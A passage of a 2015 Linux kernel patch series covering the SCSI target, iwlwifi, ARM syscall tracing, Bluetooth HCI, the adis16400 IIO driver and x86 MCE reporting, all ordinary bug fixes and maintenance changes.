drivers/target/target_core_transport.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c index 99a38cf320ff..90c92f04a586 100644 --- a/drivers/target/target_core_transport.c +++ b/drivers/target/target_core_transport.c @@ -1770,7 +1770,7 @@ static int target_write_prot_action(struct se_cmd *cmd) sectors, 0, NULL, 0); if (unlikely(cmd->pi_err)) { spin_lock_irq(&cmd->t_state_lock); - cmd->transport_state &= ~CMD_T_BUSY|CMD_T_SENT; + cmd->transport_state &= ~(CMD_T_BUSY|CMD_T_SENT); spin_unlock_irq(&cmd->t_state_lock); transport_generic_request_failure(cmd, cmd->pi_err); return -1; @@ -1868,7 +1868,7 @@ void target_execute_cmd(struct se_cmd *cmd) if (target_handle_task_attr(cmd)) { spin_lock_irq(&cmd->t_state_lock); - cmd->transport_state &= ~CMD_T_BUSY|CMD_T_SENT; + cmd->transport_state &= ~(CMD_T_BUSY | CMD_T_SENT); spin_unlock_irq(&cmd->t_state_lock); return; } From ed65918735a50e1002d856749d3f1f5072f92cfa Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Thu, 30 Apr 2015 09:29:06 +0300 Subject: [PATCH 055/872] iwlwifi: 7000: modify the firmware name for 3165 3165 really needs to load iwlwifi-7265D-13.ucode. This device is supported starting from -13.ucode, update the MIN and OK defines accordingly. While at it, add 3165 to the device list in the Kconfig file. Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/Kconfig | 1 + drivers/net/wireless/iwlwifi/iwl-7000.c | 16 ++++++++-------- 2 files changed, 9 insertions(+), 8 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/Kconfig b/drivers/net/wireless/iwlwifi/Kconfig index ab019b45551b..f89f446e5c8a 100644 --- a/drivers/net/wireless/iwlwifi/Kconfig +++ b/drivers/net/wireless/iwlwifi/Kconfig @@ -21,6 +21,7 @@ config IWLWIFI Intel 7260 Wi-Fi Adapter Intel 3160 Wi-Fi Adapter Intel 7265 Wi-Fi Adapter + Intel 3165 Wi-Fi Adapter This driver uses the kernel's mac80211 subsystem. diff --git a/drivers/net/wireless/iwlwifi/iwl-7000.c b/drivers/net/wireless/iwlwifi/iwl-7000.c index 36e786f0387b..74ad278116be 100644 --- a/drivers/net/wireless/iwlwifi/iwl-7000.c +++ b/drivers/net/wireless/iwlwifi/iwl-7000.c @@ -70,15 +70,14 @@ /* Highest firmware API version supported */ #define IWL7260_UCODE_API_MAX 13 -#define IWL3160_UCODE_API_MAX 13 /* Oldest version we won't warn about */ #define IWL7260_UCODE_API_OK 12 -#define IWL3160_UCODE_API_OK 12 +#define IWL3165_UCODE_API_OK 13 /* Lowest firmware API version supported */ #define IWL7260_UCODE_API_MIN 10 -#define IWL3160_UCODE_API_MIN 10 +#define IWL3165_UCODE_API_MIN 13 /* NVM versions */ #define IWL7260_NVM_VERSION 0x0a1d @@ -104,9 +103,6 @@ #define IWL3160_FW_PRE "iwlwifi-3160-" #define IWL3160_MODULE_FIRMWARE(api) IWL3160_FW_PRE __stringify(api) ".ucode" -#define IWL3165_FW_PRE "iwlwifi-3165-" -#define IWL3165_MODULE_FIRMWARE(api) IWL3165_FW_PRE __stringify(api) ".ucode" - #define IWL7265_FW_PRE "iwlwifi-7265-" #define IWL7265_MODULE_FIRMWARE(api) IWL7265_FW_PRE __stringify(api) ".ucode" @@ -248,8 +244,13 @@ static const struct iwl_ht_params iwl7265_ht_params = { const struct iwl_cfg iwl3165_2ac_cfg = { .name = "Intel(R) Dual Band Wireless AC 3165", - .fw_name_pre = IWL3165_FW_PRE, + .fw_name_pre = IWL7265D_FW_PRE, IWL_DEVICE_7000, + /* sparse doens't like the re-assignment but it is safe */ +#ifndef __CHECKER__ + .ucode_api_ok = IWL3165_UCODE_API_OK, + .ucode_api_min = IWL3165_UCODE_API_MIN, +#endif .ht_params = &iwl7000_ht_params, .nvm_ver = IWL3165_NVM_VERSION, .nvm_calib_ver = IWL3165_TX_POWER_VERSION, @@ -325,6 +326,5 @@ const struct iwl_cfg iwl7265d_n_cfg = { MODULE_FIRMWARE(IWL7260_MODULE_FIRMWARE(IWL7260_UCODE_API_OK)); MODULE_FIRMWARE(IWL3160_MODULE_FIRMWARE(IWL3160_UCODE_API_OK)); -MODULE_FIRMWARE(IWL3165_MODULE_FIRMWARE(IWL3160_UCODE_API_OK)); MODULE_FIRMWARE(IWL7265_MODULE_FIRMWARE(IWL7260_UCODE_API_OK)); MODULE_FIRMWARE(IWL7265D_MODULE_FIRMWARE(IWL7260_UCODE_API_OK)); From 1aa02b5a33506387828f77eb607342a7dfa6beff Mon Sep 17 00:00:00 2001 From: Avri Altman Date: Wed, 29 Apr 2015 05:11:10 +0300 Subject: [PATCH 056/872] iwlwifi: pcie: don't disable the busmaster DMA clock for family 8000 Disabling the clocks is a standard procedure while stopping the device. On family 8000 however, disabling the bus master DMA clock increases the NIC's power consumption. To fix this, skip this call if the device family is IWL_DEVICE_FAMILY_8000. Signed-off-by: Avri Altman Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/pcie/trans.c | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/pcie/trans.c b/drivers/net/wireless/iwlwifi/pcie/trans.c index 47bbf573fdc8..d6f6515fe663 100644 --- a/drivers/net/wireless/iwlwifi/pcie/trans.c +++ b/drivers/net/wireless/iwlwifi/pcie/trans.c @@ -1049,9 +1049,11 @@ static void iwl_trans_pcie_stop_device(struct iwl_trans *trans, bool low_power) iwl_pcie_rx_stop(trans); /* Power-down device's busmaster DMA clocks */ - iwl_write_prph(trans, APMG_CLK_DIS_REG, - APMG_CLK_VAL_DMA_CLK_RQT); - udelay(5); + if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) { + iwl_write_prph(trans, APMG_CLK_DIS_REG, + APMG_CLK_VAL_DMA_CLK_RQT); + udelay(5); + } } /* Make sure (redundant) we've released our request to stay awake */ From ba830b3d093580f424fd31b7cd693046a86cf030 Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Thu, 14 May 2015 12:11:38 +0300 Subject: [PATCH 057/872] iwlwifi: mvm: fix MLME trigger A few triggers have status = MLME_SUCCESS and they are still interesting. E.g. if we want to collect data upon deauth, the status will be MLME_SUCCESS. Fix that. Fixes: d42f53503406 ("iwlwifi: mvm: add trigger for firmware dump upon MLME failures") Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 3 --- 1 file changed, 3 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index 40265b9c66ae..dda9f7b5f342 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -3995,9 +3995,6 @@ static void iwl_mvm_mac_event_callback(struct ieee80211_hw *hw, if (!iwl_fw_dbg_trigger_enabled(mvm->fw, FW_DBG_TRIGGER_MLME)) return; - if (event->u.mlme.status == MLME_SUCCESS) - return; - trig = iwl_fw_dbg_get_trigger(mvm->fw, FW_DBG_TRIGGER_MLME); trig_mlme = (void *)trig->data; if (!iwl_fw_dbg_trigger_check_stop(mvm, vif, trig)) From 1b97937246d8b97c0760d16d8992c7937bdf5e6a Mon Sep 17 00:00:00 2001 From: Russell King Date: Fri, 15 May 2015 11:02:23 +0100 Subject: [PATCH 058/872] ARM: fix missing syscall trace exit Josh Stone reports: I've discovered a case where both arm and arm64 will miss a ptrace syscall-exit that they should report. If the syscall is entered without TIF_SYSCALL_TRACE set, then it goes on the fast path. It's then possible to have TIF_SYSCALL_TRACE added in the middle of the syscall, but ret_fast_syscall doesn't check this flag again. Fix this by always checking for a syscall trace in the fast exit path. Reported-by: Josh Stone Signed-off-by: Russell King --- arch/arm/kernel/entry-common.S | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/arch/arm/kernel/entry-common.S b/arch/arm/kernel/entry-common.S index f8ccc21fa032..4e7f40c577e6 100644 --- a/arch/arm/kernel/entry-common.S +++ b/arch/arm/kernel/entry-common.S @@ -33,7 +33,9 @@ ret_fast_syscall: UNWIND(.fnstart ) UNWIND(.cantunwind ) disable_irq @ disable interrupts - ldr r1, [tsk, #TI_FLAGS] + ldr r1, [tsk, #TI_FLAGS] @ re-check for syscall tracing + tst r1, #_TIF_SYSCALL_WORK + bne __sys_trace_return tst r1, #_TIF_WORK_MASK bne fast_work_pending asm_trace_hardirqs_on From cffd2eedf91aa9e459b8640807ee6ea7bd8ee145 Mon Sep 17 00:00:00 2001 From: Frederic Danis Date: Fri, 15 May 2015 11:58:39 +0200 Subject: [PATCH 059/872] Bluetooth: Fix calls to __hci_cmd_sync() Remove test of command reply status as it is already performed by __hci_cmd_sync(). __hci_cmd_sync_ev() function already returns an error if it got a non-zero status either through a Command Complete or a Command Status event. For both of these events the status is collected up in the event handlers called by hci_event_packet() and then passed as the second parameter to req_complete_skb(). The req_complete_skb() callback in turn is hci_req_sync_complete() for __hci_cmd_sync_ev() which stores the status in hdev->req_result. The hdev->req_result is then further converted through bt_to_errno() back in __hci_cmd_sync_ev(). Signed-off-by: Frederic Danis Signed-off-by: Marcel Holtmann --- net/bluetooth/hci_core.c | 5 ----- 1 file changed, 5 deletions(-) diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c index 4663c3dad3f5..db11b9d728b3 100644 --- a/net/bluetooth/hci_core.c +++ b/net/bluetooth/hci_core.c @@ -94,7 +94,6 @@ static ssize_t dut_mode_write(struct file *file, const char __user *user_buf, char buf[32]; size_t buf_size = min(count, (sizeof(buf)-1)); bool enable; - int err; if (!test_bit(HCI_UP, &hdev->flags)) return -ENETDOWN; @@ -121,12 +120,8 @@ static ssize_t dut_mode_write(struct file *file, const char __user *user_buf, if (IS_ERR(skb)) return PTR_ERR(skb); - err = -bt_to_errno(skb->data[0]); kfree_skb(skb); - if (err < 0) - return err; - hci_dev_change_flag(hdev, HCI_DUT_MODE); return count; From 5e13441ca413f5a8d04601d675accb35d37c6b08 Mon Sep 17 00:00:00 2001 From: Frederic Danis Date: Fri, 15 May 2015 11:58:40 +0200 Subject: [PATCH 060/872] Bluetooth: btusb: Fix calls to __hci_cmd_sync() Remove test of command reply status as it is already performed by __hci_cmd_sync(). __hci_cmd_sync_ev() function already returns an error if it got a non-zero status either through a Command Complete or a Command Status event. For both of these events the status is collected up in the event handlers called by hci_event_packet() and then passed as the second parameter to req_complete_skb(). The req_complete_skb() callback in turn is hci_req_sync_complete() for __hci_cmd_sync_ev() which stores the status in hdev->req_result. The hdev->req_result is then further converted through bt_to_errno() back in __hci_cmd_sync_ev(). Signed-off-by: Frederic Danis Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btusb.c | 36 ------------------------------------ 1 file changed, 36 deletions(-) diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c index df87016d18ab..b9f282112153 100644 --- a/drivers/bluetooth/btusb.c +++ b/drivers/bluetooth/btusb.c @@ -1577,12 +1577,6 @@ static int btusb_setup_intel(struct hci_dev *hdev) } ver = (struct intel_version *)skb->data; - if (ver->status) { - BT_ERR("%s Intel fw version event failed (%02x)", hdev->name, - ver->status); - kfree_skb(skb); - return -bt_to_errno(ver->status); - } BT_INFO("%s: read Intel version: %02x%02x%02x%02x%02x%02x%02x%02x%02x", hdev->name, ver->hw_platform, ver->hw_variant, @@ -1630,15 +1624,6 @@ static int btusb_setup_intel(struct hci_dev *hdev) return PTR_ERR(skb); } - if (skb->data[0]) { - u8 evt_status = skb->data[0]; - - BT_ERR("%s enable Intel manufacturer mode event failed (%02x)", - hdev->name, evt_status); - kfree_skb(skb); - release_firmware(fw); - return -bt_to_errno(evt_status); - } kfree_skb(skb); disable_patch = 1; @@ -1984,13 +1969,6 @@ static int btusb_setup_intel_new(struct hci_dev *hdev) } ver = (struct intel_version *)skb->data; - if (ver->status) { - BT_ERR("%s: Intel version command failure (%02x)", - hdev->name, ver->status); - err = -bt_to_errno(ver->status); - kfree_skb(skb); - return err; - } /* The hardware platform number has a fixed value of 0x37 and * for now only accept this single value. @@ -2065,13 +2043,6 @@ static int btusb_setup_intel_new(struct hci_dev *hdev) } params = (struct intel_boot_params *)skb->data; - if (params->status) { - BT_ERR("%s: Intel boot parameters command failure (%02x)", - hdev->name, params->status); - err = -bt_to_errno(params->status); - kfree_skb(skb); - return err; - } BT_INFO("%s: Device revision is %u", hdev->name, le16_to_cpu(params->dev_revid)); @@ -2304,13 +2275,6 @@ static void btusb_hw_error_intel(struct hci_dev *hdev, u8 code) return; } - if (skb->data[0] != 0x00) { - BT_ERR("%s: Exception info command failure (%02x)", - hdev->name, skb->data[0]); - kfree_skb(skb); - return; - } - BT_ERR("%s: Exception info %s", hdev->name, (char *)(skb->data + 1)); kfree_skb(skb); From b1f5cf0cae090dae9ac045670fec2d0c5253592a Mon Sep 17 00:00:00 2001 From: Frederic Danis Date: Fri, 15 May 2015 11:58:41 +0200 Subject: [PATCH 061/872] Bluetooth: btintel: Fix calls to __hci_cmd_sync() Remove test of command reply status as it is already performed by __hci_cmd_sync(). __hci_cmd_sync_ev() function already returns an error if it got a non-zero status either through a Command Complete or a Command Status event. For both of these events the status is collected up in the event handlers called by hci_event_packet() and then passed as the second parameter to req_complete_skb(). The req_complete_skb() callback in turn is hci_req_sync_complete() for __hci_cmd_sync_ev() which stores the status in hdev->req_result. The hdev->req_result is then further converted through bt_to_errno() back in __hci_cmd_sync_ev(). Signed-off-by: Frederic Danis Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btintel.c | 6 ------ 1 file changed, 6 deletions(-) diff --git a/drivers/bluetooth/btintel.c b/drivers/bluetooth/btintel.c index 2d43d4279b00..828f2f8d1568 100644 --- a/drivers/bluetooth/btintel.c +++ b/drivers/bluetooth/btintel.c @@ -53,12 +53,6 @@ int btintel_check_bdaddr(struct hci_dev *hdev) } bda = (struct hci_rp_read_bd_addr *)skb->data; - if (bda->status) { - BT_ERR("%s: Intel device address result failed (%02x)", - hdev->name, bda->status); - kfree_skb(skb); - return -bt_to_errno(bda->status); - } /* For some Intel based controllers, the default Bluetooth device * address 00:03:19:9E:8B:00 can be found. These controllers are From 43b79209b5be533173eea08535558cf517b334ca Mon Sep 17 00:00:00 2001 From: Frederic Danis Date: Fri, 15 May 2015 11:58:42 +0200 Subject: [PATCH 062/872] Bluetooth: btbcm: Fix calls to __hci_cmd_sync() Remove test of command reply status as it is already performed by __hci_cmd_sync(). __hci_cmd_sync_ev() function already returns an error if it got a non-zero status either through a Command Complete or a Command Status event. For both of these events the status is collected up in the event handlers called by hci_event_packet() and then passed as the second parameter to req_complete_skb(). The req_complete_skb() callback in turn is hci_req_sync_complete() for __hci_cmd_sync_ev() which stores the status in hdev->req_result. The hdev->req_result is then further converted through bt_to_errno() back in __hci_cmd_sync_ev(). Signed-off-by: Frederic Danis Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btbcm.c | 6 ------ 1 file changed, 6 deletions(-) diff --git a/drivers/bluetooth/btbcm.c b/drivers/bluetooth/btbcm.c index 4bba86677adc..728fce38a5a2 100644 --- a/drivers/bluetooth/btbcm.c +++ b/drivers/bluetooth/btbcm.c @@ -55,12 +55,6 @@ int btbcm_check_bdaddr(struct hci_dev *hdev) } bda = (struct hci_rp_read_bd_addr *)skb->data; - if (bda->status) { - BT_ERR("%s: BCM: Device address result failed (%02x)", - hdev->name, bda->status); - kfree_skb(skb); - return -bt_to_errno(bda->status); - } /* The address 00:20:70:02:A0:00 indicates a BCM20702A0 controller * with no configured address. From 110baab1d12836508c68a36cd5bb2e76896f2efd Mon Sep 17 00:00:00 2001 From: Pratyush Anand Date: Thu, 30 Apr 2015 09:46:07 +0530 Subject: [PATCH 063/872] MAINTAINERS: Add Pratyush Anand as SPEAr13xx and DesignWare PCIe maintainer Didn't add myself as Maintainer earlier, as I was moving out of ST and didn't had a board to test. But learnt recently that, it's fine being in MAINTAINERS in such situations, at least I can review the patches. So, let me add myself. Signed-off-by: Pratyush Anand Signed-off-by: Bjorn Helgaas Acked-by: Jingoo Han --- MAINTAINERS | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/MAINTAINERS b/MAINTAINERS index 781e099495d3..72674ba8cca5 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -7547,6 +7547,7 @@ F: drivers/pci/host/pci-exynos.c PCI DRIVER FOR SYNOPSIS DESIGNWARE M: Jingoo Han +M: Pratyush Anand L: linux-pci@vger.kernel.org S: Maintained F: drivers/pci/host/*designware* @@ -7560,8 +7561,9 @@ F: Documentation/devicetree/bindings/pci/host-generic-pci.txt F: drivers/pci/host/pci-host-generic.c PCIE DRIVER FOR ST SPEAR13XX +M: Pratyush Anand L: linux-pci@vger.kernel.org -S: Orphan +S: Maintained F: drivers/pci/host/*spear* PCMCIA SUBSYSTEM From 69ca2d771e4e709c5ae1125858e1246e77ef8b86 Mon Sep 17 00:00:00 2001 From: Lars-Peter Clausen Date: Fri, 15 May 2015 17:18:34 +0200 Subject: [PATCH 064/872] iio: adis16400: Report pressure channel scale Add the scale for the pressure channel, which is currently missing. Signed-off-by: Lars-Peter Clausen Fixes: 76ada52f7f5d ("iio:adis16400: Add support for the adis16448") Cc: Signed-off-by: Jonathan Cameron --- drivers/iio/imu/adis16400_core.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/iio/imu/adis16400_core.c b/drivers/iio/imu/adis16400_core.c index fa795dcd5f75..8de6427121e2 100644 --- a/drivers/iio/imu/adis16400_core.c +++ b/drivers/iio/imu/adis16400_core.c @@ -405,6 +405,11 @@ static int adis16400_read_raw(struct iio_dev *indio_dev, *val = st->variant->temp_scale_nano / 1000000; *val2 = (st->variant->temp_scale_nano % 1000000); return IIO_VAL_INT_PLUS_MICRO; + case IIO_PRESSURE: + /* 20 uBar = 0.002kPascal */ + *val = 0; + *val2 = 2000; + return IIO_VAL_INT_PLUS_MICRO; default: return -EINVAL; } From 7323d59862802ca109451eeda9777024a7625509 Mon Sep 17 00:00:00 2001 From: Paul Cercueil Date: Fri, 15 May 2015 17:18:35 +0200 Subject: [PATCH 065/872] iio: adis16400: Use != channel indices for the two voltage channels Previously, the two voltage channels had the same ID, which didn't cause conflicts in sysfs only because one channel is named and the other isn't; this is still violating the spec though, two indexed channels should never have the same index. Signed-off-by: Paul Cercueil Signed-off-by: Lars-Peter Clausen Cc: Signed-off-by: Jonathan Cameron --- drivers/iio/imu/adis16400_core.c | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/drivers/iio/imu/adis16400_core.c b/drivers/iio/imu/adis16400_core.c index 8de6427121e2..7b63788c7d1c 100644 --- a/drivers/iio/imu/adis16400_core.c +++ b/drivers/iio/imu/adis16400_core.c @@ -459,10 +459,10 @@ static int adis16400_read_raw(struct iio_dev *indio_dev, } } -#define ADIS16400_VOLTAGE_CHAN(addr, bits, name, si) { \ +#define ADIS16400_VOLTAGE_CHAN(addr, bits, name, si, chn) { \ .type = IIO_VOLTAGE, \ .indexed = 1, \ - .channel = 0, \ + .channel = chn, \ .extend_name = name, \ .info_mask_separate = BIT(IIO_CHAN_INFO_RAW) | \ BIT(IIO_CHAN_INFO_SCALE), \ @@ -479,10 +479,10 @@ static int adis16400_read_raw(struct iio_dev *indio_dev, } #define ADIS16400_SUPPLY_CHAN(addr, bits) \ - ADIS16400_VOLTAGE_CHAN(addr, bits, "supply", ADIS16400_SCAN_SUPPLY) + ADIS16400_VOLTAGE_CHAN(addr, bits, "supply", ADIS16400_SCAN_SUPPLY, 0) #define ADIS16400_AUX_ADC_CHAN(addr, bits) \ - ADIS16400_VOLTAGE_CHAN(addr, bits, NULL, ADIS16400_SCAN_ADC) + ADIS16400_VOLTAGE_CHAN(addr, bits, NULL, ADIS16400_SCAN_ADC, 1) #define ADIS16400_GYRO_CHAN(mod, addr, bits) { \ .type = IIO_ANGL_VEL, \ From c2a8b623a089d52c199e305e7905829907db8ec8 Mon Sep 17 00:00:00 2001 From: Paul Cercueil Date: Fri, 15 May 2015 17:18:36 +0200 Subject: [PATCH 066/872] iio: adis16400: Compute the scan mask from channel indices We unfortunately can't use ~0UL for the scan mask to indicate that the only valid scan mask is all channels selected. The IIO core needs the exact mask to work correctly and not a super-set of it. So calculate the masked based on the channels that are available for a particular device. Signed-off-by: Paul Cercueil Signed-off-by: Lars-Peter Clausen Fixes: 5eda3550a3cc ("staging:iio:adis16400: Preallocate transfer message") Cc: Signed-off-by: Jonathan Cameron --- drivers/iio/imu/adis16400.h | 1 + drivers/iio/imu/adis16400_core.c | 25 ++++++++++++++++++------- 2 files changed, 19 insertions(+), 7 deletions(-) diff --git a/drivers/iio/imu/adis16400.h b/drivers/iio/imu/adis16400.h index 0916bf6b6c31..1e8fd2e81d45 100644 --- a/drivers/iio/imu/adis16400.h +++ b/drivers/iio/imu/adis16400.h @@ -165,6 +165,7 @@ struct adis16400_state { int filt_int; struct adis adis; + unsigned long avail_scan_mask[2]; }; /* At the moment triggers are only used for ring buffer diff --git a/drivers/iio/imu/adis16400_core.c b/drivers/iio/imu/adis16400_core.c index 7b63788c7d1c..7b06e058b000 100644 --- a/drivers/iio/imu/adis16400_core.c +++ b/drivers/iio/imu/adis16400_core.c @@ -796,11 +796,6 @@ static const struct iio_info adis16400_info = { .debugfs_reg_access = adis_debugfs_reg_access, }; -static const unsigned long adis16400_burst_scan_mask[] = { - ~0UL, - 0, -}; - static const char * const adis16400_status_error_msgs[] = { [ADIS16400_DIAG_STAT_ZACCL_FAIL] = "Z-axis accelerometer self-test failure", [ADIS16400_DIAG_STAT_YACCL_FAIL] = "Y-axis accelerometer self-test failure", @@ -848,6 +843,20 @@ static const struct adis_data adis16400_data = { BIT(ADIS16400_DIAG_STAT_POWER_LOW), }; +static void adis16400_setup_chan_mask(struct adis16400_state *st) +{ + const struct adis16400_chip_info *chip_info = st->variant; + unsigned i; + + for (i = 0; i < chip_info->num_channels; i++) { + const struct iio_chan_spec *ch = &chip_info->channels[i]; + + if (ch->scan_index >= 0 && + ch->scan_index != ADIS16400_SCAN_TIMESTAMP) + st->avail_scan_mask[0] |= BIT(ch->scan_index); + } +} + static int adis16400_probe(struct spi_device *spi) { struct adis16400_state *st; @@ -871,8 +880,10 @@ static int adis16400_probe(struct spi_device *spi) indio_dev->info = &adis16400_info; indio_dev->modes = INDIO_DIRECT_MODE; - if (!(st->variant->flags & ADIS16400_NO_BURST)) - indio_dev->available_scan_masks = adis16400_burst_scan_mask; + if (!(st->variant->flags & ADIS16400_NO_BURST)) { + adis16400_setup_chan_mask(st); + indio_dev->available_scan_masks = st->avail_scan_mask; + } ret = adis_init(&st->adis, indio_dev, spi, &adis16400_data); if (ret) From 9df560350c90f3d3909fe653399b3584c9a17b61 Mon Sep 17 00:00:00 2001 From: Paul Cercueil Date: Fri, 15 May 2015 17:18:37 +0200 Subject: [PATCH 067/872] iio: adis16400: Fix burst mode There are a few issues with the burst mode support. For one we don't setup the rx buffer, so the buffer will never be filled and all samples will read as the zero. Furthermore the tx buffer has the wrong type, which means the driver sends the wrong command and not the right data is returned. The final issue is that in burst mode all channels are transferred. Hence the length of the transfer length should be the number of hardware channels * 2 bytes. Currently the driver uses indio_dev->scan_bytes for this. But if the timestamp channel is enabled the scan_bytes will be larger than the burst length. Fix this by just calculating the burst length based on the number of hardware channels. Signed-off-by: Paul Cercueil Signed-off-by: Lars-Peter Clausen Fixes: 5eda3550a3cc ("staging:iio:adis16400: Preallocate transfer message") Cc: Signed-off-by: Jonathan Cameron --- drivers/iio/imu/adis16400_buffer.c | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/drivers/iio/imu/adis16400_buffer.c b/drivers/iio/imu/adis16400_buffer.c index 6e727ffe5262..629ae84d4e62 100644 --- a/drivers/iio/imu/adis16400_buffer.c +++ b/drivers/iio/imu/adis16400_buffer.c @@ -18,7 +18,8 @@ int adis16400_update_scan_mode(struct iio_dev *indio_dev, { struct adis16400_state *st = iio_priv(indio_dev); struct adis *adis = &st->adis; - uint16_t *tx; + unsigned int burst_length; + u8 *tx; if (st->variant->flags & ADIS16400_NO_BURST) return adis_update_scan_mode(indio_dev, scan_mask); @@ -26,26 +27,27 @@ int adis16400_update_scan_mode(struct iio_dev *indio_dev, kfree(adis->xfer); kfree(adis->buffer); + /* All but the timestamp channel */ + burst_length = (indio_dev->num_channels - 1) * sizeof(u16); + adis->xfer = kcalloc(2, sizeof(*adis->xfer), GFP_KERNEL); if (!adis->xfer) return -ENOMEM; - adis->buffer = kzalloc(indio_dev->scan_bytes + sizeof(u16), - GFP_KERNEL); + adis->buffer = kzalloc(burst_length + sizeof(u16), GFP_KERNEL); if (!adis->buffer) return -ENOMEM; - tx = adis->buffer + indio_dev->scan_bytes; - + tx = adis->buffer + burst_length; tx[0] = ADIS_READ_REG(ADIS16400_GLOB_CMD); tx[1] = 0; adis->xfer[0].tx_buf = tx; adis->xfer[0].bits_per_word = 8; adis->xfer[0].len = 2; - adis->xfer[1].tx_buf = tx; + adis->xfer[1].rx_buf = adis->buffer; adis->xfer[1].bits_per_word = 8; - adis->xfer[1].len = indio_dev->scan_bytes; + adis->xfer[1].len = burst_length; spi_message_init(&adis->msg); spi_message_add_tail(&adis->xfer[0], &adis->msg); From d046ba268adb87c7780494ecf897cbafbf100d57 Mon Sep 17 00:00:00 2001 From: Lars-Peter Clausen Date: Fri, 15 May 2015 17:18:38 +0200 Subject: [PATCH 068/872] iio: adis16400: Fix burst transfer for adis16448 The adis16448, unlike the other chips in this family, in addition to the hardware channels also sends out the DIAG_STAT register in burst mode before them. Handle that case by skipping over the first 2 bytes before we pass the received data to the buffer. Signed-off-by: Lars-Peter Clausen Fixes: 76ada52f7f5d ("iio:adis16400: Add support for the adis16448") Cc: Signed-off-by: Jonathan Cameron --- drivers/iio/imu/adis16400.h | 1 + drivers/iio/imu/adis16400_buffer.c | 10 +++++++++- drivers/iio/imu/adis16400_core.c | 3 ++- 3 files changed, 12 insertions(+), 2 deletions(-) diff --git a/drivers/iio/imu/adis16400.h b/drivers/iio/imu/adis16400.h index 1e8fd2e81d45..73b189c1c0fb 100644 --- a/drivers/iio/imu/adis16400.h +++ b/drivers/iio/imu/adis16400.h @@ -139,6 +139,7 @@ #define ADIS16400_NO_BURST BIT(1) #define ADIS16400_HAS_SLOW_MODE BIT(2) #define ADIS16400_HAS_SERIAL_NUMBER BIT(3) +#define ADIS16400_BURST_DIAG_STAT BIT(4) struct adis16400_state; diff --git a/drivers/iio/imu/adis16400_buffer.c b/drivers/iio/imu/adis16400_buffer.c index 629ae84d4e62..90c24a23c679 100644 --- a/drivers/iio/imu/adis16400_buffer.c +++ b/drivers/iio/imu/adis16400_buffer.c @@ -29,6 +29,8 @@ int adis16400_update_scan_mode(struct iio_dev *indio_dev, /* All but the timestamp channel */ burst_length = (indio_dev->num_channels - 1) * sizeof(u16); + if (st->variant->flags & ADIS16400_BURST_DIAG_STAT) + burst_length += sizeof(u16); adis->xfer = kcalloc(2, sizeof(*adis->xfer), GFP_KERNEL); if (!adis->xfer) @@ -63,6 +65,7 @@ irqreturn_t adis16400_trigger_handler(int irq, void *p) struct adis16400_state *st = iio_priv(indio_dev); struct adis *adis = &st->adis; u32 old_speed_hz = st->adis.spi->max_speed_hz; + void *buffer; int ret; if (!adis->buffer) @@ -83,7 +86,12 @@ irqreturn_t adis16400_trigger_handler(int irq, void *p) spi_setup(st->adis.spi); } - iio_push_to_buffers_with_timestamp(indio_dev, adis->buffer, + if (st->variant->flags & ADIS16400_BURST_DIAG_STAT) + buffer = adis->buffer + sizeof(u16); + else + buffer = adis->buffer; + + iio_push_to_buffers_with_timestamp(indio_dev, buffer, pf->timestamp); iio_trigger_notify_done(indio_dev->trig); diff --git a/drivers/iio/imu/adis16400_core.c b/drivers/iio/imu/adis16400_core.c index 7b06e058b000..2fd68f2219a7 100644 --- a/drivers/iio/imu/adis16400_core.c +++ b/drivers/iio/imu/adis16400_core.c @@ -778,7 +778,8 @@ static struct adis16400_chip_info adis16400_chips[] = { .channels = adis16448_channels, .num_channels = ARRAY_SIZE(adis16448_channels), .flags = ADIS16400_HAS_PROD_ID | - ADIS16400_HAS_SERIAL_NUMBER, + ADIS16400_HAS_SERIAL_NUMBER | + ADIS16400_BURST_DIAG_STAT, .gyro_scale_micro = IIO_DEGREE_TO_RAD(10000), /* 0.01 deg/s */ .accel_scale_micro = IIO_G_TO_M_S_2(833), /* 1/1200 g */ .temp_scale_nano = 73860000, /* 0.07386 C */ From 17fea54bf0ab34fa09a06bbde2f58ed7bbdf9299 Mon Sep 17 00:00:00 2001 From: Borislav Petkov Date: Mon, 18 May 2015 10:07:17 +0200 Subject: [PATCH 069/872] x86/mce: Fix MCE severity messages Derek noticed that a critical MCE gets reported with the wrong error type description: [Hardware Error]: CPU 34: Machine Check Exception: 5 Bank 9: f200003f000100b0 [Hardware Error]: RIP !INEXACT! 10: {intel_idle+0xb1/0x170} [Hardware Error]: TSC 49587b8e321cb [Hardware Error]: PROCESSOR 0:306e4 TIME 1431561296 SOCKET 1 APIC 29 [Hardware Error]: Some CPUs didn't answer in synchronization [Hardware Error]: Machine check: Invalid ^^^^^^^ The last line with 'Invalid' should have printed the high level MCE error type description we get from mce_severity, i.e. something like: [Hardware Error]: Machine check: Action required: data load error in a user process this happens due to the fact that mce_no_way_out() iterates over all MCA banks and possibly overwrites the @msg argument which is used in the panic printing later. Change behavior to take the message of only and the (last) critical MCE it detects. Reported-by: 